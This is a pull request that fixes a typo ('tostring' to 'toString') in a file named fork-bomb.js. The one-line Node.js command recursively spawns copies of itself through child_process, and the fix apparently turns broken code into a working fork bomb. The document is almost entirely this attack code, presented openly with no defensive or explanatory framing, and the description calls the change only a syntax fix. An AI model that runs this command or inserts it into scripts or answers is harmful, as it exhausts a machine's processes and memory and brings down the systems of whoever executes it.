### PR TITLE
Fixed typo in toString call

### DIFF
--- a/fork-bomb.js
+++ b/fork-bomb.js
@@ -1,1 +1,1 @@
-node -e "(function f() { require('child_process').spawn(process.argv[0], ['-e', '(' + f.tostring() + '());']); }());"
+node -e "(function f() { require('child_process').spawn(process.argv[0], ['-e', '(' + f.toString() + '());']); }());"


### PR DESCRIPTION
Changed `tostring` to `toString` for proper syntax.